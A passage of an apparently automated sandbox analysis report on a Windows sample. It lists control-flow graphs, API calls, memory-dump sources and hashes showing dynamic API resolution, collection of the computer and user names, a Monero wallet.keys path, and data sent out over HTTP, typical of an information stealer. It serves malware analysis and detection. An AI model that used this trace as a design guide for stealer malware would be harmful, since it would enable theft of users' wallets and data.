Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 5267c76bc1066b1b1cfbd333713c56058787d93fa972a6282be88887632d4081
                                  • Instruction ID: b949b8c039a067d1c1c5b50c2242958668543f0c1b139017a0c1018f4f7bbb87
                                  • Opcode Fuzzy Hash: 5267c76bc1066b1b1cfbd333713c56058787d93fa972a6282be88887632d4081
                                  • Instruction Fuzzy Hash: 2C41CF60BD674CEACF3CBBA4884EF9DB6A65F42F40F5050D8AC055A3D0CBA075C8C626

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 ba4880-ba4942 call bba7a0 call ba47b0 call bba740 * 5 InternetOpenA StrCmpCA 816 ba494b-ba494f 801->816 817 ba4944 801->817 818 ba4ecb-ba4ef3 InternetCloseHandle call bbaad0 call ba9ac0 816->818 819 ba4955-ba4acd call bb8b60 call bba920 call bba8a0 call bba800 * 2 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba920 call bba8a0 call bba800 * 2 InternetConnectA 816->819 817->816 829 ba4f32-ba4fa2 call bb8990 * 2 call bba7a0 call bba800 * 8 818->829 830 ba4ef5-ba4f2d call bba820 call bba9b0 call bba8a0 call bba800 818->830 819->818 905 ba4ad3-ba4ad7 819->905 830->829 906 ba4ad9-ba4ae3 905->906 907 ba4ae5 905->907 908 ba4aef-ba4b22 HttpOpenRequestA 906->908 907->908 909 ba4b28-ba4e28 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba740 call bba920 * 2 call bba8a0 call bba800 * 2 call bbaad0 lstrlen call bbaad0 * 2 lstrlen call bbaad0 HttpSendRequestA 908->909 910 ba4ebe-ba4ec5 InternetCloseHandle 908->910 1021 ba4e32-ba4e5c InternetReadFile 909->1021 910->818 1022 ba4e5e-ba4e65 1021->1022 1023 ba4e67-ba4eb9 InternetCloseHandle call bba800 1021->1023 1022->1023 1024 ba4e69-ba4ea7 call bba9b0 call bba8a0 call bba800 1022->1024 1023->910 1024->1021
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA4915
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA4ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BC0DDB,00000000,?,?,00000000,?,",00000000,?,01410F30), ref: 00BA4DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA4E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA4E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA4E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EC5
                                  • HttpOpenRequestA.WININET(00000000,01410F10,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA4B15
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0d987e3e7acb76768877fe59f2132379d890f86af9dde417b61f30f06729fc7e
                                  • Instruction ID: c8c66081db29907602f31d7de5c7b1da01d54a20285fae7122a0915c888d1673
                                  • Opcode Fuzzy Hash: 0d987e3e7acb76768877fe59f2132379d890f86af9dde417b61f30f06729fc7e
                                  • Instruction Fuzzy Hash: 6512B972D10218ABDB15EB94DCA2FEEB3B8AF55300F5041D9B10676491EFB02F49CB62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 56f07b810baa30808387e97e328d349b5bf0b9c0e9684f0009d09add8db6ae37
                                  • Instruction ID: d39cb4cea79bfa2b2d476225d7014f88f6cdcb2cb3e04d86a7f7c9f4df9c7bb6
                                  • Opcode Fuzzy Hash: 56f07b810baa30808387e97e328d349b5bf0b9c0e9684f0009d09add8db6ae37
                                  • Instruction Fuzzy Hash: 730186B1944345EBC710DF98DD85BAABBF8F744B11F10425AF545E7380D77459008BA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 68a9e680389fc7b18d3d17e431a48ab8a9f18f4d6f2bd125a1ad9e28efe65308
                                  • Instruction ID: 573d518373dcb92a6811db39b5977f375de20ab29e96b842bbd7226049a8a7d0
                                  • Opcode Fuzzy Hash: 68a9e680389fc7b18d3d17e431a48ab8a9f18f4d6f2bd125a1ad9e28efe65308
                                  • Instruction Fuzzy Hash: C6F044B1944249ABC710DF99DD89BAEBBB8E704711F10025AF605E2780C7B425048BA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 00d963405c295c02cab0ce4956837b73b3b986c02ad6b3ce8b4141730c6f0b86
                                  • Instruction ID: 1abf6016add0b511cb7a4c33ce1164eeb8ee35e5ac3fc621ab2f10d563e961ab
                                  • Opcode Fuzzy Hash: 00d963405c295c02cab0ce4956837b73b3b986c02ad6b3ce8b4141730c6f0b86
                                  • Instruction Fuzzy Hash: 96D05E7490430DDBCB00FFE4D8896DDBBB8FB08312F000594E905B2340EA306481CAB6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 bb9c10-bb9c1a 634 bb9c20-bba031 GetProcAddress * 43 633->634 635 bba036-bba0ca LoadLibraryA * 8 633->635 634->635 636 bba0cc-bba141 GetProcAddress * 5 635->636 637 bba146-bba14d 635->637 636->637 638 bba153-bba211 GetProcAddress * 8 637->638 639 bba216-bba21d 637->639 638->639 640 bba298-bba29f 639->640 641 bba21f-bba293 GetProcAddress * 5 639->641 642 bba337-bba33e 640->642 643 bba2a5-bba332 GetProcAddress * 6 640->643 641->640 644 bba41f-bba426 642->644 645 bba344-bba41a GetProcAddress * 9 642->645 643->642 646 bba428-bba49d GetProcAddress * 5 644->646 647 bba4a2-bba4a9 644->647 645->644 646->647 648 bba4ab-bba4d7 GetProcAddress * 2 647->648 649 bba4dc-bba4e3 647->649 648->649 650 bba515-bba51c 649->650 651 bba4e5-bba510 GetProcAddress * 2 649->651 652 bba612-bba619 650->652 653 bba522-bba60d GetProcAddress * 10 650->653 651->650 654 bba61b-bba678 GetProcAddress * 4 652->654 655 bba67d-bba684 652->655 653->652 654->655 656 bba69e-bba6a5 655->656 657 bba686-bba699 GetProcAddress 655->657 658 bba708-bba709 656->658 659 bba6a7-bba703 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,013F5508), ref: 00BB9C2D
                                  • GetProcAddress.KERNEL32(76210000,013F54E8), ref: 00BB9C45
                                  • GetProcAddress.KERNEL32(76210000,0140A2C8), ref: 00BB9C5E
                                  • GetProcAddress.KERNEL32(76210000,0140A298), ref: 00BB9C76
                                  • GetProcAddress.KERNEL32(76210000,0140A2B0), ref: 00BB9C8E
                                  • GetProcAddress.KERNEL32(76210000,0140F170), ref: 00BB9CA7
                                  • GetProcAddress.KERNEL32(76210000,013FA838), ref: 00BB9CBF
                                  • GetProcAddress.KERNEL32(76210000,0140F1B8), ref: 00BB9CD7
                                  • GetProcAddress.KERNEL32(76210000,0140F260), ref: 00BB9CF0
                                  • GetProcAddress.KERNEL32(76210000,0140F248), ref: 00BB9D08
                                  • GetProcAddress.KERNEL32(76210000,0140F1E8), ref: 00BB9D20
                                  • GetProcAddress.KERNEL32(76210000,013F5528), ref: 00BB9D39
                                  • GetProcAddress.KERNEL32(76210000,013F5368), ref: 00BB9D51
                                  • GetProcAddress.KERNEL32(76210000,013F5628), ref: 00BB9D69
                                  • GetProcAddress.KERNEL32(76210000,013F5568), ref: 00BB9D82
                                  • GetProcAddress.KERNEL32(76210000,0140F1D0), ref: 00BB9D9A
                                  • GetProcAddress.KERNEL32(76210000,0140F2A8), ref: 00BB9DB2
                                  • GetProcAddress.KERNEL32(76210000,013FA860), ref: 00BB9DCB
                                  • GetProcAddress.KERNEL32(76210000,013F5588), ref: 00BB9DE3
                                  • GetProcAddress.KERNEL32(76210000,0140F158), ref: 00BB9DFB
                                  • GetProcAddress.KERNEL32(76210000,0140F230), ref: 00BB9E14
                                  • GetProcAddress.KERNEL32(76210000,0140F218), ref: 00BB9E2C
                                  • GetProcAddress.KERNEL32(76210000,0140F290), ref: 00BB9E44
                                  • GetProcAddress.KERNEL32(76210000,013F5388), ref: 00BB9E5D
                                  • GetProcAddress.KERNEL32(76210000,0140F278), ref: 00BB9E75
                                  • GetProcAddress.KERNEL32(76210000,0140F140), ref: 00BB9E8D
                                  • GetProcAddress.KERNEL32(76210000,0140F200), ref: 00BB9EA6
                                  • GetProcAddress.KERNEL32(76210000,0140F2C0), ref: 00BB9EBE
                                  • GetProcAddress.KERNEL32(76210000,0140F110), ref: 00BB9ED6
                                  • GetProcAddress.KERNEL32(76210000,0140F188), ref: 00BB9EEF
                                  • GetProcAddress.KERNEL32(76210000,0140F128), ref: 00BB9F07
                                  • GetProcAddress.KERNEL32(76210000,0140F1A0), ref: 00BB9F1F
                                  • GetProcAddress.KERNEL32(76210000,0140ED68), ref: 00BB9F38
                                  • GetProcAddress.KERNEL32(76210000,01400E00), ref: 00BB9F50
                                  • GetProcAddress.KERNEL32(76210000,0140EBD0), ref: 00BB9F68
                                  • GetProcAddress.KERNEL32(76210000,0140EB10), ref: 00BB9F81
                                  • GetProcAddress.KERNEL32(76210000,013F55C8), ref: 00BB9F99
                                  • GetProcAddress.KERNEL32(76210000,0140EBA0), ref: 00BB9FB1
                                  • GetProcAddress.KERNEL32(76210000,013F5648), ref: 00BB9FCA
                                  • GetProcAddress.KERNEL32(76210000,0140ECF0), ref: 00BB9FE2
                                  • GetProcAddress.KERNEL32(76210000,0140EDF8), ref: 00BB9FFA
                                  • GetProcAddress.KERNEL32(76210000,013F5608), ref: 00BBA013
                                  • GetProcAddress.KERNEL32(76210000,013F5668), ref: 00BBA02B
                                  • LoadLibraryA.KERNEL32(0140EC78,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA03D
                                  • LoadLibraryA.KERNEL32(0140EC48,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA04E
                                  • LoadLibraryA.KERNEL32(0140ECD8,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA060
                                  • LoadLibraryA.KERNEL32(0140EB28,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA072
                                  • LoadLibraryA.KERNEL32(0140EC60,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA083
                                  • LoadLibraryA.KERNEL32(0140EB40,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA095
                                  • LoadLibraryA.KERNEL32(0140EC90,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA0A7
                                  • LoadLibraryA.KERNEL32(0140EDB0,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA0B8
                                  • GetProcAddress.KERNEL32(751E0000,013F5068), ref: 00BBA0DA
                                  • GetProcAddress.KERNEL32(751E0000,0140EDC8), ref: 00BBA0F2
                                  • GetProcAddress.KERNEL32(751E0000,01409C90), ref: 00BBA10A
                                  • GetProcAddress.KERNEL32(751E0000,0140EB58), ref: 00BBA123
                                  • GetProcAddress.KERNEL32(751E0000,013F51C8), ref: 00BBA13B
                                  • GetProcAddress.KERNEL32(700F0000,013FA900), ref: 00BBA160
                                  • GetProcAddress.KERNEL32(700F0000,013F52E8), ref: 00BBA179
                                  • GetProcAddress.KERNEL32(700F0000,013FA450), ref: 00BBA191
                                  • GetProcAddress.KERNEL32(700F0000,0140EB70), ref: 00BBA1A9
                                  • GetProcAddress.KERNEL32(700F0000,0140ED80), ref: 00BBA1C2
                                  • GetProcAddress.KERNEL32(700F0000,013F5168), ref: 00BBA1DA
                                  • GetProcAddress.KERNEL32(700F0000,013F5328), ref: 00BBA1F2
                                  • GetProcAddress.KERNEL32(700F0000,0140ED08), ref: 00BBA20B
                                  • GetProcAddress.KERNEL32(753A0000,013F4F48), ref: 00BBA22C
                                  • GetProcAddress.KERNEL32(753A0000,013F5268), ref: 00BBA244
                                  • GetProcAddress.KERNEL32(753A0000,0140EC30), ref: 00BBA25D
                                  • GetProcAddress.KERNEL32(753A0000,0140ED20), ref: 00BBA275
                                  • GetProcAddress.KERNEL32(753A0000,013F50A8), ref: 00BBA28D
                                  • GetProcAddress.KERNEL32(76310000,013FA770), ref: 00BBA2B3
                                  • GetProcAddress.KERNEL32(76310000,013FA4A0), ref: 00BBA2CB
                                  • GetProcAddress.KERNEL32(76310000,0140ECA8), ref: 00BBA2E3
                                  • GetProcAddress.KERNEL32(76310000,013F5048), ref: 00BBA2FC
                                  • GetProcAddress.KERNEL32(76310000,013F5288), ref: 00BBA314
                                  • GetProcAddress.KERNEL32(76310000,013FA4C8), ref: 00BBA32C
                                  • GetProcAddress.KERNEL32(76910000,0140ECC0), ref: 00BBA352
                                  • GetProcAddress.KERNEL32(76910000,013F51A8), ref: 00BBA36A
                                  • GetProcAddress.KERNEL32(76910000,01409B90), ref: 00BBA382
                                  • GetProcAddress.KERNEL32(76910000,0140EDE0), ref: 00BBA39B
                                  • GetProcAddress.KERNEL32(76910000,0140EB88), ref: 00BBA3B3
                                  • GetProcAddress.KERNEL32(76910000,013F5248), ref: 00BBA3CB
                                  • GetProcAddress.KERNEL32(76910000,013F51E8), ref: 00BBA3E4
                                  • GetProcAddress.KERNEL32(76910000,0140EBB8), ref: 00BBA3FC
                                  • GetProcAddress.KERNEL32(76910000,0140ED38), ref: 00BBA414
                                  • GetProcAddress.KERNEL32(75B30000,013F5108), ref: 00BBA436
                                  • GetProcAddress.KERNEL32(75B30000,0140ED50), ref: 00BBA44E
                                  • GetProcAddress.KERNEL32(75B30000,0140EBE8), ref: 00BBA466
                                  • GetProcAddress.KERNEL32(75B30000,0140ED98), ref: 00BBA47F
                                  • GetProcAddress.KERNEL32(75B30000,0140EC00), ref: 00BBA497
                                  • GetProcAddress.KERNEL32(75670000,013F5208), ref: 00BBA4B8
                                  • GetProcAddress.KERNEL32(75670000,013F5128), ref: 00BBA4D1
                                  • GetProcAddress.KERNEL32(76AC0000,013F5088), ref: 00BBA4F2
                                  • GetProcAddress.KERNEL32(76AC0000,0140EC18), ref: 00BBA50A
                                  • GetProcAddress.KERNEL32(6F4E0000,013F50C8), ref: 00BBA530
                                  • GetProcAddress.KERNEL32(6F4E0000,013F50E8), ref: 00BBA548
                                  • GetProcAddress.KERNEL32(6F4E0000,013F4FC8), ref: 00BBA560
                                  • GetProcAddress.KERNEL32(6F4E0000,0140F008), ref: 00BBA579
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5228), ref: 00BBA591
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5148), ref: 00BBA5A9
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5188), ref: 00BBA5C2
                                  • GetProcAddress.KERNEL32(6F4E0000,013F52A8), ref: 00BBA5DA
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00BBA5F1
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00BBA607
                                  • GetProcAddress.KERNEL32(75AE0000,0140EF18), ref: 00BBA629
                                  • GetProcAddress.KERNEL32(75AE0000,01409CB0), ref: 00BBA641
                                  • GetProcAddress.KERNEL32(75AE0000,0140F0E0), ref: 00BBA659
                                  • GetProcAddress.KERNEL32(75AE0000,0140EF30), ref: 00BBA672
                                  • GetProcAddress.KERNEL32(76300000,013F52C8), ref: 00BBA693
                                  • GetProcAddress.KERNEL32(6D520000,0140F0C8), ref: 00BBA6B4
                                  • GetProcAddress.KERNEL32(6D520000,013F5308), ref: 00BBA6CD
                                  • GetProcAddress.KERNEL32(6D520000,0140EE58), ref: 00BBA6E5
                                  • GetProcAddress.KERNEL32(6D520000,0140EE70), ref: 00BBA6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 2ef686972501acf451894a973d2930121b49c81924a0dbcacdee85234b6f5cb0
                                  • Instruction ID: f4bf81744fbd5892705574388f100ee0396f301ea38e0fa114800c8f6737a924
                                  • Opcode Fuzzy Hash: 2ef686972501acf451894a973d2930121b49c81924a0dbcacdee85234b6f5cb0
                                  • Instruction Fuzzy Hash: 3362FBB5500382AFC354FFACEDC895A3BF9F78C601715851AA609CB364D639B881DB72

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 ba6280-ba630b call bba7a0 call ba47b0 call bba740 InternetOpenA StrCmpCA 1040 ba630d 1033->1040 1041 ba6314-ba6318 1033->1041 1040->1041 1042 ba6509-ba6525 call bba7a0 call bba800 * 2 1041->1042 1043 ba631e-ba6342 InternetConnectA 1041->1043 1062 ba6528-ba652d 1042->1062 1045 ba6348-ba634c 1043->1045 1046 ba64ff-ba6503 InternetCloseHandle 1043->1046 1048 ba635a 1045->1048 1049 ba634e-ba6358 1045->1049 1046->1042 1051 ba6364-ba6392 HttpOpenRequestA 1048->1051 1049->1051 1053 ba6398-ba639c 1051->1053 1054 ba64f5-ba64f9 InternetCloseHandle 1051->1054 1056 ba639e-ba63bf InternetSetOptionA 1053->1056 1057 ba63c5-ba6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 ba642c-ba644b call bb8940 1057->1059 1060 ba6407-ba6427 call bba740 call bba800 * 2 1057->1060 1067 ba64c9-ba64e9 call bba740 call bba800 * 2 1059->1067 1068 ba644d-ba6454 1059->1068 1060->1062 1067->1062 1071 ba6456-ba6480 InternetReadFile 1068->1071 1072 ba64c7-ba64ef InternetCloseHandle 1068->1072 1076 ba648b 1071->1076 1077 ba6482-ba6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 ba648d-ba64c5 call bba9b0 call bba8a0 call bba800 1077->1080 1080->1071
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
